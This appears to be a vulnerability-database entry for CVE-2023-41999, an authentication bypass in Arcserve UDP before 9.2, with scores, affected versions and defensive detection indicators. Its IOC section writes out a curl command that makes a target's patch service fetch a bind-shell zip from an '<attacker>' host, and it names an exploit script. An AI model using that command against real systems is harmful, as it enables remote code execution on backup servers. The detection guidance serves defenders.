CVE-2023-41999
published 2023-11-27


Priority: P2 (69)
Severity: critical, 9.8 (CVSS 3.1)
CVSS vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS: 1.44% (69.8th percentile)
An authentication bypass exists in Arcserve UDP prior to version 9.2. An unauthenticated, remote attacker can obtain a valid authentication identifier that allows them to authenticate to the management console and perform tasks that require authentication.

Affected (2 ranges)

Vendor   | Product      | Version range | Fixed in
arcserve | arcserve_udp | < 9.2         | 9.2
arcserve | udp          | < 9.2         | 9.2

Detection & IOCs

command: curl -ki -H 'Content-Type: text/xml' -d 'http://<attacker>:8000/download/shell_bind_tcp.zip' 'https://<target>:8014/RPSWebServiceImpl/services/RPSService4CPMImpl'
port: 8014
url: /RPSWebServiceImpl/services/RPSService4CPMImpl
path: \Engine\BIN\patch\
command: python3 arcserve_udp_console_auth_bypass.py
url: /fileHandling?action=upload
  • Monitor for unauthenticated calls to ValidateUserByUUID() on the Arcserve UDP management console, which is the mechanism exploited to obtain a valid authentication UUID without credentials.
  • Alert on unauthenticated access to the getEdgeAccount API endpoint post-authentication-bypass, which exposes administrative credentials including encrypted passwords.
  • Detect inbound requests to /RPSWebServiceImpl/services/RPSService4CPMImpl on port 8014 with Content-Type: text/xml from unauthenticated sources, which may indicate exploitation of the downloadAndInstallPatch() RCE vector (CVE-2023-41998; related context).
  • Monitor for new file creation under \Engine\BIN\patch\ on Arcserve UDP hosts, especially ZIP or EXE files, which may indicate exploitation of the downloadAndInstallPatch() routine.
  • Watch for processes spawned as 'nt authority\system' from the Arcserve Tomcat directory, which is indicative of successful RCE post-exploitation.
  • The authentication bypass (CVE-2023-41999) relies on the UUID-based authentication mechanism (ValidateUserByUUID) being exposed to unauthenticated remote attackers; this is a design-level weakness in the management console's authentication flow.
  • The vulnerability affects Arcserve UDP prior to version 9.2; patches are also available for UDP 7.0u2, 8.1, and 9.1 for customers unable to upgrade.